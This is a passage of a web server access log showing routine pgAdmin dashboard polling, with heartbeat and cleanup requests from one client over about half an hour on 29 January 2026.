db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:32:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:32:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:33:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:33:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:34:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:34:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:35:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:35:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:36:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:36:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:36:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:37:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:37:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:38:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:38:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:39:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:39:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:40:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:40:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:41:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:42:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:42:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:43:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:43:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:44:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:44:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:45:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:45:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:46:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:47:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:47:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:48:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:48:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:49:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:49:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:50:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:50:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:51:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:51:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:51:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:52:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:52:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:53:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:53:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:54:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:54:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:55:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:55:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:56:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:56:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:56:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:57:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:57:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:58:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:58:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:59:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:59:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:00:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:00:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:01:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:01:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:01:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:02:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:02:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:03:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:03:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:04:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:04:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:05:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:05:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:06:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 